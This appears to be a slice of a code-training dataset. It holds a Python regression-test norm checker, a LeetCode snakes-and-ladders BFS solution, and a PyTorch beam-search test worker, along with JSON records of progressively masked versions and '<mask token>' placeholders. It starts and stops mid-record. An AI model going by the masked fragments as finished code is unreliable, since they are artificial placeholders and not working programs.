self._load_oof_cv_score() / self.n_folds #oof_cv_scores\n self.score2 = evaluation(self.df.label.values, eval_preds, labels=self.df.label.unique())[self.metric_name] #ovr_score\n\n print('OOF_CV_SCORE: {:.5f} | OVR_SCORE: {:.5f}'.format(self.score1, self.score2))\n \n if return_score: return self.score1, self.score2\n",
"step-ids": [
23,
29,
31,
33,
35
]
}
|
[
23,
29,
31,
33,
35
] |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Check mean system norm errors in regression tests
This script determines the pass/fail status of a regression test by comparing
the "Mean System Norm" values output at each timestep against "gold values"
from the reference file provided by the user.
Success is determined by the following criteria: the number of timesteps in the
log file matches the number of timesteps in the gold file, and for each
timestep the system norms satisfy the absolute or the relative tolerance
(defaults 1.0e-15 and 1.0e-7 respectively; a step fails only when it exceeds
both bounds). The tolerances can be adjusted using command line arguments;
pass `-h` to get a brief usage message.
"""
import sys
import os
import math
import subprocess
import argparse
from shutil import copyfile
def parse_arguments():
"""Parse command line arguments"""
parser = argparse.ArgumentParser(
description="Nalu-Wind regression test check utility")
parser.add_argument(
'--abs-tol', type=float, default=1.0e-15,
help="Tolerance for absolute error")
parser.add_argument(
'--rel-tol', type=float, default=1.0e-7,
help="Tolerance for relative error")
parser.add_argument(
"test_name", help="Regression test name")
parser.add_argument(
"gold_norms", help="Absolute path to the gold norms file")
parser.add_argument(
'--save-norm-file', required=False,
help="File in which to save a copy of the norms")
return parser.parse_args()
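# Example invocation (hypothetical script and file names, for illustration only):
#   python norm_check.py --abs-tol 1e-14 --rel-tol 1e-6 ablNeutralEdge /gold/ablNeutralEdge.norm.gold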
def load_norm_file(fname):
"""Parse the norm file and return the mean system norms"""
try:
with open(fname, 'r') as fh:
lines = fh.readlines()
norms = [float(ll.strip().split()[0]) for ll in lines]
return norms
except:
return []
def generate_test_norms(testname):
"""Parse the log file and generate test norms"""
logname = testname + ".log"
norm_name = testname + ".norm"
cmdline = """awk '/Mean System Norm:/ { print $4, $5, $6; }' %s > %s """%(
logname, norm_name)
os.system(cmdline)
args = parse_arguments()
    if args.save_norm_file is not None:
copyfile(norm_name, args.save_norm_file)
return load_norm_file(norm_name)
def get_run_time(testname):
"""Return STKPERF total time"""
logname = testname + ".log"
cmdline = """awk '/STKPERF: Total Time/ { print $4; }' %s """%(
logname)
try:
pp = subprocess.run(cmdline, shell=True, check=True, capture_output=True)
return pp.stdout.decode('UTF-8').strip()
except:
return ""
def check_norms(test_norms, gold_norms, atol, rtol):
"""Check the regression test norms"""
if len(test_norms) != len(gold_norms):
print("Number of timesteps do not match", flush=True)
return (False, 1.0e16, 1.0e16)
test_pass = True
abs_diff = 0.0
rel_diff = 0.0
for t1, t2 in zip(test_norms, gold_norms):
adiff = abs(t1 - t2)
rdiff = abs(t1 / t2 - 1.0)
abs_diff = max(abs_diff, adiff)
rel_diff = max(rel_diff, rdiff)
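        # A timestep fails only when it misses BOTH bounds below; satisfying
        # either the absolute or the relative tolerance counts as a pass.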
if (adiff > atol) and (rdiff > rtol):
test_pass = False
return (test_pass, abs_diff, rel_diff)
def main():
"""Driver function"""
args = parse_arguments()
test_norms = generate_test_norms(args.test_name)
gold_norms = load_norm_file(args.gold_norms)
run_time = get_run_time(args.test_name)
run_time = float(run_time) if run_time else 0.0
status, adiff, rdiff = check_norms(
test_norms, gold_norms, args.abs_tol, args.rel_tol)
name = args.test_name.ljust(40, ".")
status_str = "PASS:" if status else "FAIL:"
print("%s %-40s %10.4fs %.4e %.4e"%(
status_str, name, run_time, adiff, rdiff), flush=True)
sys.exit(0 if status else 1)
if __name__ == "__main__":
main()
|
normal
|
{
"blob_id": "d03669924233edf33fcb6645f5ed7ab118f54a95",
"index": 7610,
"step-1": "<mask token>\n\n\ndef load_norm_file(fname):\n \"\"\"Parse the norm file and return the mean system norms\"\"\"\n try:\n with open(fname, 'r') as fh:\n lines = fh.readlines()\n norms = [float(ll.strip().split()[0]) for ll in lines]\n return norms\n except:\n return []\n\n\ndef generate_test_norms(testname):\n \"\"\"Parse the log file and generate test norms\"\"\"\n logname = testname + '.log'\n norm_name = testname + '.norm'\n cmdline = \"awk '/Mean System Norm:/ { print $4, $5, $6; }' %s > %s \" % (\n logname, norm_name)\n os.system(cmdline)\n args = parse_arguments()\n if args.save_norm_file != None:\n copyfile(norm_name, args.save_norm_file)\n return load_norm_file(norm_name)\n\n\ndef get_run_time(testname):\n \"\"\"Return STKPERF total time\"\"\"\n logname = testname + '.log'\n cmdline = \"awk '/STKPERF: Total Time/ { print $4; }' %s \" % logname\n try:\n pp = subprocess.run(cmdline, shell=True, check=True, capture_output\n =True)\n return pp.stdout.decode('UTF-8').strip()\n except:\n return ''\n\n\ndef check_norms(test_norms, gold_norms, atol, rtol):\n \"\"\"Check the regression test norms\"\"\"\n if len(test_norms) != len(gold_norms):\n print('Number of timesteps do not match', flush=True)\n return False, 1e+16, 1e+16\n test_pass = True\n abs_diff = 0.0\n rel_diff = 0.0\n for t1, t2 in zip(test_norms, gold_norms):\n adiff = abs(t1 - t2)\n rdiff = abs(t1 / t2 - 1.0)\n abs_diff = max(abs_diff, adiff)\n rel_diff = max(rel_diff, rdiff)\n if adiff > atol and rdiff > rtol:\n test_pass = False\n return test_pass, abs_diff, rel_diff\n\n\ndef main():\n \"\"\"Driver function\"\"\"\n args = parse_arguments()\n test_norms = generate_test_norms(args.test_name)\n gold_norms = load_norm_file(args.gold_norms)\n run_time = get_run_time(args.test_name)\n run_time = float(run_time) if run_time else 0.0\n status, adiff, rdiff = check_norms(test_norms, gold_norms, args.abs_tol,\n args.rel_tol)\n name = args.test_name.ljust(40, '.')\n status_str = 'PASS:' if status else 'FAIL:'\n print('%s %-40s %10.4fs %.4e %.4e' % (status_str, name, run_time, adiff,\n rdiff), flush=True)\n sys.exit(0 if status else 1)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef parse_arguments():\n \"\"\"Parse command line arguments\"\"\"\n parser = argparse.ArgumentParser(description=\n 'Nalu-Wind regression test check utility')\n parser.add_argument('--abs-tol', type=float, default=1e-15, help=\n 'Tolerance for absolute error')\n parser.add_argument('--rel-tol', type=float, default=1e-07, help=\n 'Tolerance for relative error')\n parser.add_argument('test_name', help='Regression test name')\n parser.add_argument('gold_norms', help=\n 'Absolute path to the gold norms file')\n parser.add_argument('--save-norm-file', required=False, help=\n 'File in which to save a copy of the norms')\n return parser.parse_args()\n\n\ndef load_norm_file(fname):\n \"\"\"Parse the norm file and return the mean system norms\"\"\"\n try:\n with open(fname, 'r') as fh:\n lines = fh.readlines()\n norms = [float(ll.strip().split()[0]) for ll in lines]\n return norms\n except:\n return []\n\n\ndef generate_test_norms(testname):\n \"\"\"Parse the log file and generate test norms\"\"\"\n logname = testname + '.log'\n norm_name = testname + '.norm'\n cmdline = \"awk '/Mean System Norm:/ { print $4, $5, $6; }' %s > %s \" % (\n logname, norm_name)\n os.system(cmdline)\n args = parse_arguments()\n if args.save_norm_file != None:\n copyfile(norm_name, args.save_norm_file)\n return load_norm_file(norm_name)\n\n\ndef get_run_time(testname):\n \"\"\"Return STKPERF total time\"\"\"\n logname = testname + '.log'\n cmdline = \"awk '/STKPERF: Total Time/ { print $4; }' %s \" % logname\n try:\n pp = subprocess.run(cmdline, shell=True, check=True, capture_output\n =True)\n return pp.stdout.decode('UTF-8').strip()\n except:\n return ''\n\n\ndef check_norms(test_norms, gold_norms, atol, rtol):\n \"\"\"Check the regression test norms\"\"\"\n if len(test_norms) != len(gold_norms):\n print('Number of timesteps do not match', flush=True)\n return False, 1e+16, 1e+16\n test_pass = True\n abs_diff = 0.0\n rel_diff = 0.0\n for t1, t2 in zip(test_norms, gold_norms):\n adiff = abs(t1 - t2)\n rdiff = abs(t1 / t2 - 1.0)\n abs_diff = max(abs_diff, adiff)\n rel_diff = max(rel_diff, rdiff)\n if adiff > atol and rdiff > rtol:\n test_pass = False\n return test_pass, abs_diff, rel_diff\n\n\ndef main():\n \"\"\"Driver function\"\"\"\n args = parse_arguments()\n test_norms = generate_test_norms(args.test_name)\n gold_norms = load_norm_file(args.gold_norms)\n run_time = get_run_time(args.test_name)\n run_time = float(run_time) if run_time else 0.0\n status, adiff, rdiff = check_norms(test_norms, gold_norms, args.abs_tol,\n args.rel_tol)\n name = args.test_name.ljust(40, '.')\n status_str = 'PASS:' if status else 'FAIL:'\n print('%s %-40s %10.4fs %.4e %.4e' % (status_str, name, run_time, adiff,\n rdiff), flush=True)\n sys.exit(0 if status else 1)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef parse_arguments():\n \"\"\"Parse command line arguments\"\"\"\n parser = argparse.ArgumentParser(description=\n 'Nalu-Wind regression test check utility')\n parser.add_argument('--abs-tol', type=float, default=1e-15, help=\n 'Tolerance for absolute error')\n parser.add_argument('--rel-tol', type=float, default=1e-07, help=\n 'Tolerance for relative error')\n parser.add_argument('test_name', help='Regression test name')\n parser.add_argument('gold_norms', help=\n 'Absolute path to the gold norms file')\n parser.add_argument('--save-norm-file', required=False, help=\n 'File in which to save a copy of the norms')\n return parser.parse_args()\n\n\ndef load_norm_file(fname):\n \"\"\"Parse the norm file and return the mean system norms\"\"\"\n try:\n with open(fname, 'r') as fh:\n lines = fh.readlines()\n norms = [float(ll.strip().split()[0]) for ll in lines]\n return norms\n except:\n return []\n\n\ndef generate_test_norms(testname):\n \"\"\"Parse the log file and generate test norms\"\"\"\n logname = testname + '.log'\n norm_name = testname + '.norm'\n cmdline = \"awk '/Mean System Norm:/ { print $4, $5, $6; }' %s > %s \" % (\n logname, norm_name)\n os.system(cmdline)\n args = parse_arguments()\n if args.save_norm_file != None:\n copyfile(norm_name, args.save_norm_file)\n return load_norm_file(norm_name)\n\n\ndef get_run_time(testname):\n \"\"\"Return STKPERF total time\"\"\"\n logname = testname + '.log'\n cmdline = \"awk '/STKPERF: Total Time/ { print $4; }' %s \" % logname\n try:\n pp = subprocess.run(cmdline, shell=True, check=True, capture_output\n =True)\n return pp.stdout.decode('UTF-8').strip()\n except:\n return ''\n\n\ndef check_norms(test_norms, gold_norms, atol, rtol):\n \"\"\"Check the regression test norms\"\"\"\n if len(test_norms) != len(gold_norms):\n print('Number of timesteps do not match', flush=True)\n return False, 1e+16, 1e+16\n test_pass = True\n abs_diff = 0.0\n rel_diff = 0.0\n for t1, t2 in zip(test_norms, gold_norms):\n adiff = abs(t1 - t2)\n rdiff = abs(t1 / t2 - 1.0)\n abs_diff = max(abs_diff, adiff)\n rel_diff = max(rel_diff, rdiff)\n if adiff > atol and rdiff > rtol:\n test_pass = False\n return test_pass, abs_diff, rel_diff\n\n\ndef main():\n \"\"\"Driver function\"\"\"\n args = parse_arguments()\n test_norms = generate_test_norms(args.test_name)\n gold_norms = load_norm_file(args.gold_norms)\n run_time = get_run_time(args.test_name)\n run_time = float(run_time) if run_time else 0.0\n status, adiff, rdiff = check_norms(test_norms, gold_norms, args.abs_tol,\n args.rel_tol)\n name = args.test_name.ljust(40, '.')\n status_str = 'PASS:' if status else 'FAIL:'\n print('%s %-40s %10.4fs %.4e %.4e' % (status_str, name, run_time, adiff,\n rdiff), flush=True)\n sys.exit(0 if status else 1)\n\n\nif __name__ == '__main__':\n main()\n",
"step-4": "<mask token>\nimport sys\nimport os\nimport math\nimport subprocess\nimport argparse\nfrom shutil import copyfile\n\n\ndef parse_arguments():\n \"\"\"Parse command line arguments\"\"\"\n parser = argparse.ArgumentParser(description=\n 'Nalu-Wind regression test check utility')\n parser.add_argument('--abs-tol', type=float, default=1e-15, help=\n 'Tolerance for absolute error')\n parser.add_argument('--rel-tol', type=float, default=1e-07, help=\n 'Tolerance for relative error')\n parser.add_argument('test_name', help='Regression test name')\n parser.add_argument('gold_norms', help=\n 'Absolute path to the gold norms file')\n parser.add_argument('--save-norm-file', required=False, help=\n 'File in which to save a copy of the norms')\n return parser.parse_args()\n\n\ndef load_norm_file(fname):\n \"\"\"Parse the norm file and return the mean system norms\"\"\"\n try:\n with open(fname, 'r') as fh:\n lines = fh.readlines()\n norms = [float(ll.strip().split()[0]) for ll in lines]\n return norms\n except:\n return []\n\n\ndef generate_test_norms(testname):\n \"\"\"Parse the log file and generate test norms\"\"\"\n logname = testname + '.log'\n norm_name = testname + '.norm'\n cmdline = \"awk '/Mean System Norm:/ { print $4, $5, $6; }' %s > %s \" % (\n logname, norm_name)\n os.system(cmdline)\n args = parse_arguments()\n if args.save_norm_file != None:\n copyfile(norm_name, args.save_norm_file)\n return load_norm_file(norm_name)\n\n\ndef get_run_time(testname):\n \"\"\"Return STKPERF total time\"\"\"\n logname = testname + '.log'\n cmdline = \"awk '/STKPERF: Total Time/ { print $4; }' %s \" % logname\n try:\n pp = subprocess.run(cmdline, shell=True, check=True, capture_output\n =True)\n return pp.stdout.decode('UTF-8').strip()\n except:\n return ''\n\n\ndef check_norms(test_norms, gold_norms, atol, rtol):\n \"\"\"Check the regression test norms\"\"\"\n if len(test_norms) != len(gold_norms):\n print('Number of timesteps do not match', flush=True)\n return False, 1e+16, 1e+16\n test_pass = True\n abs_diff = 0.0\n rel_diff = 0.0\n for t1, t2 in zip(test_norms, gold_norms):\n adiff = abs(t1 - t2)\n rdiff = abs(t1 / t2 - 1.0)\n abs_diff = max(abs_diff, adiff)\n rel_diff = max(rel_diff, rdiff)\n if adiff > atol and rdiff > rtol:\n test_pass = False\n return test_pass, abs_diff, rel_diff\n\n\ndef main():\n \"\"\"Driver function\"\"\"\n args = parse_arguments()\n test_norms = generate_test_norms(args.test_name)\n gold_norms = load_norm_file(args.gold_norms)\n run_time = get_run_time(args.test_name)\n run_time = float(run_time) if run_time else 0.0\n status, adiff, rdiff = check_norms(test_norms, gold_norms, args.abs_tol,\n args.rel_tol)\n name = args.test_name.ljust(40, '.')\n status_str = 'PASS:' if status else 'FAIL:'\n print('%s %-40s %10.4fs %.4e %.4e' % (status_str, name, run_time, adiff,\n rdiff), flush=True)\n sys.exit(0 if status else 1)\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\"\"\"\nCheck mean system norm errors in regression tests\n\nThis script determines the pass/fail status of a regression test by comparing\nthe \"Mean System Norm\" values output at each timestep against \"gold values\"\nfrom the reference file provided by the user.\n\nSuccess is determined by the following criteria: the number of timesteps in the\nlog file matches the number of timesteps in the gold file, and for each\ntimestep the system norms meet the absolute and relative tolerances (default\n1.0e-16 and 1.0e-7 respectively). The tolerances can be adjusted using command\nline arguments, pass `-h` to get a brief usage message.\n\"\"\"\n\nimport sys\nimport os\nimport math\nimport subprocess\nimport argparse\nfrom shutil import copyfile\n\ndef parse_arguments():\n \"\"\"Parse command line arguments\"\"\"\n parser = argparse.ArgumentParser(\n description=\"Nalu-Wind regression test check utility\")\n parser.add_argument(\n '--abs-tol', type=float, default=1.0e-15,\n help=\"Tolerance for absolute error\")\n parser.add_argument(\n '--rel-tol', type=float, default=1.0e-7,\n help=\"Tolerance for relative error\")\n parser.add_argument(\n \"test_name\", help=\"Regression test name\")\n parser.add_argument(\n \"gold_norms\", help=\"Absolute path to the gold norms file\")\n parser.add_argument(\n '--save-norm-file', required=False,\n help=\"File in which to save a copy of the norms\")\n return parser.parse_args()\n\ndef load_norm_file(fname):\n \"\"\"Parse the norm file and return the mean system norms\"\"\"\n try:\n with open(fname, 'r') as fh:\n lines = fh.readlines()\n norms = [float(ll.strip().split()[0]) for ll in lines]\n return norms\n except:\n return []\n\ndef generate_test_norms(testname):\n \"\"\"Parse the log file and generate test norms\"\"\"\n logname = testname + \".log\"\n norm_name = testname + \".norm\"\n cmdline = \"\"\"awk '/Mean System Norm:/ { print $4, $5, $6; }' %s > %s \"\"\"%(\n logname, norm_name)\n os.system(cmdline)\n args = parse_arguments()\n if (args.save_norm_file != None):\n copyfile(norm_name, args.save_norm_file)\n\n return load_norm_file(norm_name)\n\ndef get_run_time(testname):\n \"\"\"Return STKPERF total time\"\"\"\n logname = testname + \".log\"\n cmdline = \"\"\"awk '/STKPERF: Total Time/ { print $4; }' %s \"\"\"%(\n logname)\n try:\n pp = subprocess.run(cmdline, shell=True, check=True, capture_output=True)\n return pp.stdout.decode('UTF-8').strip()\n except:\n return \"\"\n\ndef check_norms(test_norms, gold_norms, atol, rtol):\n \"\"\"Check the regression test norms\"\"\"\n if len(test_norms) != len(gold_norms):\n print(\"Number of timesteps do not match\", flush=True)\n return (False, 1.0e16, 1.0e16)\n\n test_pass = True\n abs_diff = 0.0\n rel_diff = 0.0\n\n for t1, t2 in zip(test_norms, gold_norms):\n adiff = abs(t1 - t2)\n rdiff = abs(t1 / t2 - 1.0)\n\n abs_diff = max(abs_diff, adiff)\n rel_diff = max(rel_diff, rdiff)\n\n if (adiff > atol) and (rdiff > rtol):\n test_pass = False\n\n return (test_pass, abs_diff, rel_diff)\n\ndef main():\n \"\"\"Driver function\"\"\"\n args = parse_arguments()\n test_norms = generate_test_norms(args.test_name)\n gold_norms = load_norm_file(args.gold_norms)\n run_time = get_run_time(args.test_name)\n run_time = float(run_time) if run_time else 0.0\n status, adiff, rdiff = check_norms(\n test_norms, gold_norms, args.abs_tol, args.rel_tol)\n\n name = args.test_name.ljust(40, \".\")\n status_str = \"PASS:\" if status else \"FAIL:\"\n print(\"%s %-40s %10.4fs 
%.4e %.4e\"%(\n status_str, name, run_time, adiff, rdiff), flush=True)\n sys.exit(0 if status else 1)\n\nif __name__ == \"__main__\":\n main()\n",
"step-ids": [
5,
6,
7,
8,
9
]
}
|
[
5,
6,
7,
8,
9
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Solution:
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Solution:
def snakesAndLadders(self, board: List[List[int]]) ->int:
N = len(board)
def get_pos(num):
r = (num - 1) // N
c = (num - 1) % N
c = c if r + 1 & 1 else N - 1 - c
r = N - 1 - r
return r, c
def skip(num):
r, c = get_pos(num)
if board[r][c] != -1:
return board[r][c]
else:
return num
from collections import deque
dq = deque([1])
vis = set([1])
step = -1
while dq:
sz = len(dq)
step += 1
for _ in range(sz):
node = dq.popleft()
if node == N * N:
return step
for i in range(1, 7):
new_node = node + i
if new_node > N * N:
continue
new_node = skip(new_node)
if new_node not in vis:
dq.append(new_node)
vis.add(new_node)
return -1
<|reserved_special_token_0|>
<|reserved_special_token_1|>
from typing import List
class Solution:
def snakesAndLadders(self, board: List[List[int]]) ->int:
N = len(board)
def get_pos(num):
r = (num - 1) // N
c = (num - 1) % N
c = c if r + 1 & 1 else N - 1 - c
r = N - 1 - r
return r, c
def skip(num):
r, c = get_pos(num)
if board[r][c] != -1:
return board[r][c]
else:
return num
from collections import deque
dq = deque([1])
vis = set([1])
step = -1
while dq:
sz = len(dq)
step += 1
for _ in range(sz):
node = dq.popleft()
if node == N * N:
return step
for i in range(1, 7):
new_node = node + i
if new_node > N * N:
continue
new_node = skip(new_node)
if new_node not in vis:
dq.append(new_node)
vis.add(new_node)
return -1
<|reserved_special_token_0|>
<|reserved_special_token_1|>
#
# @lc app=leetcode.cn id=909 lang=python3
#
# [909] Snakes and Ladders
#
# @lc code=start
from typing import List
class Solution:
def snakesAndLadders(self, board: List[List[int]]) -> int:
N = len(board)
def get_pos(num):
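            # Map a 1-based square number to (row, col): squares zigzag
            # (boustrophedon) upward starting from the bottom-left corner.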
r = (num-1) // N
c = (num-1) % N
c = c if ((r+1) & 1) else (N-1 - c)
r = N-1 - r
return r, c
# r, c = get_pos(20)
# print(r, c)
def skip(num):
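            # Follow the snake or ladder on this square if one exists;
            # otherwise stay on the square itself.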
r, c = get_pos(num)
if board[r][c] != -1:
return board[r][c]
else:
return num
from collections import deque
dq = deque([1])
vis = set([1])
step = -1
while dq:
sz = len(dq)
step += 1
for _ in range(sz):
node = dq.popleft()
if (node == N*N):
return step
for i in range(1, 7):
new_node = node + i
if (new_node > N*N):
continue
new_node = skip(new_node)
if (new_node not in vis):
dq.append(new_node)
vis.add(new_node)
return -1
""" 21-06-27 每日一题打卡BFS
Accepted
211/211 cases passed (100 ms)
Your runtime beats 99.08 % of python3 submissions
Your memory usage beats 14.68 % of python3 submissions (15.1 MB)
"""
# board = [[-1,-1,-1,-1,-1,-1],
# [-1,-1,-1,-1,-1,-1],
# [-1,-1,-1,-1,-1,-1],
# [-1,35,-1,-1,13,-1],
# [-1,-1,-1,-1,-1,-1],
# [-1,15,-1,-1,-1,-1]]
# s = Solution().snakesAndLadders(board)
# print(s)
# @lc code=end
|
flexible
|
{
"blob_id": "da5a366d1cc4f192a220dc38c7a74aeb3fba7cdb",
"index": 9839,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Solution:\n <mask token>\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass Solution:\n\n def snakesAndLadders(self, board: List[List[int]]) ->int:\n N = len(board)\n\n def get_pos(num):\n r = (num - 1) // N\n c = (num - 1) % N\n c = c if r + 1 & 1 else N - 1 - c\n r = N - 1 - r\n return r, c\n\n def skip(num):\n r, c = get_pos(num)\n if board[r][c] != -1:\n return board[r][c]\n else:\n return num\n from collections import deque\n dq = deque([1])\n vis = set([1])\n step = -1\n while dq:\n sz = len(dq)\n step += 1\n for _ in range(sz):\n node = dq.popleft()\n if node == N * N:\n return step\n for i in range(1, 7):\n new_node = node + i\n if new_node > N * N:\n continue\n new_node = skip(new_node)\n if new_node not in vis:\n dq.append(new_node)\n vis.add(new_node)\n return -1\n\n\n<mask token>\n",
"step-4": "from typing import List\n\n\nclass Solution:\n\n def snakesAndLadders(self, board: List[List[int]]) ->int:\n N = len(board)\n\n def get_pos(num):\n r = (num - 1) // N\n c = (num - 1) % N\n c = c if r + 1 & 1 else N - 1 - c\n r = N - 1 - r\n return r, c\n\n def skip(num):\n r, c = get_pos(num)\n if board[r][c] != -1:\n return board[r][c]\n else:\n return num\n from collections import deque\n dq = deque([1])\n vis = set([1])\n step = -1\n while dq:\n sz = len(dq)\n step += 1\n for _ in range(sz):\n node = dq.popleft()\n if node == N * N:\n return step\n for i in range(1, 7):\n new_node = node + i\n if new_node > N * N:\n continue\n new_node = skip(new_node)\n if new_node not in vis:\n dq.append(new_node)\n vis.add(new_node)\n return -1\n\n\n<mask token>\n",
"step-5": "#\n# @lc app=leetcode.cn id=909 lang=python3\n#\n# [909] 蛇梯棋\n#\n\n# @lc code=start\nfrom typing import List\nclass Solution:\n def snakesAndLadders(self, board: List[List[int]]) -> int:\n N = len(board)\n def get_pos(num):\n r = (num-1) // N\n c = (num-1) % N\n c = c if ((r+1) & 1) else (N-1 - c) \n r = N-1 - r\n return r, c\n # r, c = get_pos(20)\n # print(r, c)\n def skip(num):\n r, c = get_pos(num)\n if board[r][c] != -1:\n return board[r][c]\n else:\n return num\n from collections import deque\n dq = deque([1])\n vis = set([1])\n step = -1\n while dq:\n sz = len(dq)\n step += 1\n for _ in range(sz):\n node = dq.popleft()\n if (node == N*N):\n return step\n for i in range(1, 7):\n new_node = node + i\n if (new_node > N*N):\n continue\n new_node = skip(new_node)\n if (new_node not in vis):\n dq.append(new_node)\n vis.add(new_node)\n\n return -1\n\n\"\"\" 21-06-27 每日一题打卡BFS\nAccepted\n211/211 cases passed (100 ms)\nYour runtime beats 99.08 % of python3 submissions\nYour memory usage beats 14.68 % of python3 submissions (15.1 MB)\n\"\"\"\n\n# board = [[-1,-1,-1,-1,-1,-1],\n# [-1,-1,-1,-1,-1,-1],\n# [-1,-1,-1,-1,-1,-1],\n# [-1,35,-1,-1,13,-1],\n# [-1,-1,-1,-1,-1,-1],\n# [-1,15,-1,-1,-1,-1]]\n\n# s = Solution().snakesAndLadders(board)\n# print(s)\n\n# @lc code=end\n\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import torch
import torch.nn as nn
from tqdm import tqdm
import torch.nn.functional as F
import torch.multiprocessing as mp
from policy_network import Policy_Network
from util import safe_log
from util import index2word, rearrange_vector_list, get_num_gpus, set_seed
class TestWorker(mp.Process):
    def __init__(self, args, worker_id, env, d_entity_neighours, d_entity2bucketid,
                 d_action_space_buckets, d_entity2id, d_relation2id,
                 reqa_checkpoint_path, d_results, word_num, entity_num,
                 relation_num, keqa_checkpoint_path, return_trace=False):
super().__init__(name='test-worker-%02d' % (worker_id))
self.args = args
self.seed = args.seed + worker_id
self.fix_batch_size = args.batch_size
self.use_keqa_vector = args.use_keqa_vector
self.max_hop = args.max_hop
self.beam_size = args.beam_size
self.return_trace = return_trace
self.d_entity_neighours = d_entity_neighours
self.d_entity2bucketid = d_entity2bucketid
self.d_action_space_buckets = d_action_space_buckets
self.id2entity = index2word(d_entity2id)
self.id2relation = index2word(d_relation2id)
self.worker_id = worker_id
self.gpu_id = self.worker_id % get_num_gpus()
self.env = env
self.d_results = d_results
self.reqa_checkpoint_path = reqa_checkpoint_path
self.word_num = word_num
self.entity_num = entity_num
self.relation_num = relation_num
self.keqa_checkpoint_path = keqa_checkpoint_path
def run(self):
set_seed(self.seed)
self.model = Policy_Network(self.args, self.word_num, self.entity_num, self.relation_num, self.keqa_checkpoint_path, self.gpu_id)
self.model.load(self.reqa_checkpoint_path)
self.model.cuda(self.gpu_id)
self.model.eval()
self.env.set_model(self.model)
self.env.set_gpu_id(self.gpu_id)
total_data_num = len(self.env.d_dataset)
hits_1_num = 0
with torch.no_grad():
for example_id in tqdm(range(0, len(self.env.d_dataset), self.fix_batch_size), desc=self.name, position=self.worker_id):
idx = range(example_id, example_id + self.fix_batch_size)
self.env.reset(idx)
self.batch_size = self.env.batch_size
batch_hits1 = self.rollout()
hits_1_num += batch_hits1
hits_1_result = 1.0 * hits_1_num / total_data_num
self.d_results['hits@1'] = hits_1_result
def rollout(self):
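        # One beam-search episode: keep the top `beam_size` partial paths for
        # `max_hop` steps, then score Hits@1 on the top-ranked final entity.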
batch_question, batch_question_len, batch_head, batch_answers = self.env.return_batch_data()
if self.return_trace:
l_search_trace = []
l_log_action_probs = []
batch_pred_vector = None
if self.use_keqa_vector:
batch_pred_vector = self.model.get_anticipated_entity_vector(batch_head, batch_question, batch_question_len, self.d_entity_neighours)
log_action_prob = torch.zeros(self.batch_size).cuda(self.gpu_id)
for t in range(self.max_hop):
path_trace, path_hidden = self.env.observe()
last_r, e_t = path_trace[-1]
batch_path_hidden = path_hidden[-1][0][-1, :, :]
k = int(e_t.size()[0] / self.batch_size)
beam_question = batch_question.unsqueeze(1).repeat(1, k, 1).view(self.batch_size * k, -1)
beam_question_len = batch_question_len.unsqueeze(1).repeat(1, k).view(self.batch_size * k)
beam_pred_vector = None
if self.use_keqa_vector:
beam_pred_vector = batch_pred_vector.unsqueeze(1).repeat(1, k, 1).view(self.batch_size * k, -1)
            db_outcomes, _, _, inv_offset = self.model.transit(
                t, e_t, beam_question, beam_question_len, batch_path_hidden,
                self.d_entity2bucketid, self.d_action_space_buckets,
                last_r, False, beam_pred_vector)
db_action_spaces = [action_space for action_space, _ in db_outcomes]
db_action_dist = [action_dist for _, action_dist in db_outcomes]
action_space = self.pad_and_cat_action_space(db_action_spaces, inv_offset)
action_dist = self.pad_and_cat(db_action_dist, padding_value=0)[inv_offset]
log_action_dist = log_action_prob.view(-1, 1) + safe_log(action_dist)
if self.return_trace:
print(t)
print(last_r, e_t)
print("----")
print(action_space[0])
print(F.softmax(log_action_dist.view(-1)).view(self.batch_size * k, -1))
print("------------------------")
if t == self.max_hop - 1:
action, log_action_prob, action_offset = self.top_k_answer_unique(log_action_dist, action_space)
else:
action, log_action_prob, action_offset = self.top_k_action(log_action_dist, action_space)
path_list, (h_t, c_t) = self.model.update_path(action, path_hidden, offset = action_offset)
self.env.step(action, path_list, (h_t, c_t))
if self.return_trace:
rearrange_vector_list(l_log_action_probs, action_offset)
l_log_action_probs.append(log_action_prob)
self.adjust_search_trace(l_search_trace, action_offset)
l_search_trace.append(action)
batch_pred_e2 = action[1].view(self.batch_size, -1)
batch_pred_e2_top1 = batch_pred_e2[:, 0].view(self.batch_size, -1)
batch_hits1 = torch.sum(torch.gather(batch_answers, 1, batch_pred_e2_top1).view(-1)).item()
if self.return_trace:
self.print_search_trace(batch_head, l_search_trace, l_log_action_probs)
return batch_hits1
def top_k_action(self, log_action_dist, action_space):
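        # Keep the k highest-scoring (relation, entity) actions per example;
        # action_offset maps each survivor back to its parent beam entry.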
full_size = len(log_action_dist)
last_k = int(full_size / self.batch_size)
(r_space, e_space), _ = action_space
action_space_size = r_space.size()[1]
log_action_dist = log_action_dist.view(self.batch_size, -1)
beam_action_space_size = log_action_dist.size()[1]
k = min(self.beam_size, beam_action_space_size)
log_action_prob, action_ind = torch.topk(log_action_dist, k)
next_r = torch.gather(r_space.view(self.batch_size, -1), 1, action_ind).view(-1)
next_e = torch.gather(e_space.view(self.batch_size, -1), 1, action_ind).view(-1)
log_action_prob = log_action_prob.view(-1)
action_beam_offset = action_ind // action_space_size
action_batch_offset = (torch.arange(self.batch_size).cuda(self.gpu_id) * last_k).unsqueeze(1)
action_offset = (action_batch_offset + action_beam_offset).view(-1)
return (next_r, next_e), log_action_prob, action_offset
def top_k_answer_unique(self, log_action_dist, action_space):
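        # Final-hop variant of top_k_action: collapse duplicate tail entities
        # (keeping each entity's best score) before taking the top k.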
full_size = len(log_action_dist)
last_k = int(full_size / self.batch_size)
(r_space, e_space), _ = action_space
action_space_size = r_space.size()[1]
r_space = r_space.view(self.batch_size, -1)
e_space = e_space.view(self.batch_size, -1)
log_action_dist = log_action_dist.view(self.batch_size, -1)
beam_action_space_size = log_action_dist.size()[1]
k = min(self.beam_size, beam_action_space_size)
next_r_list, next_e_list = [], []
log_action_prob_list = []
action_offset_list = []
for i in range(self.batch_size):
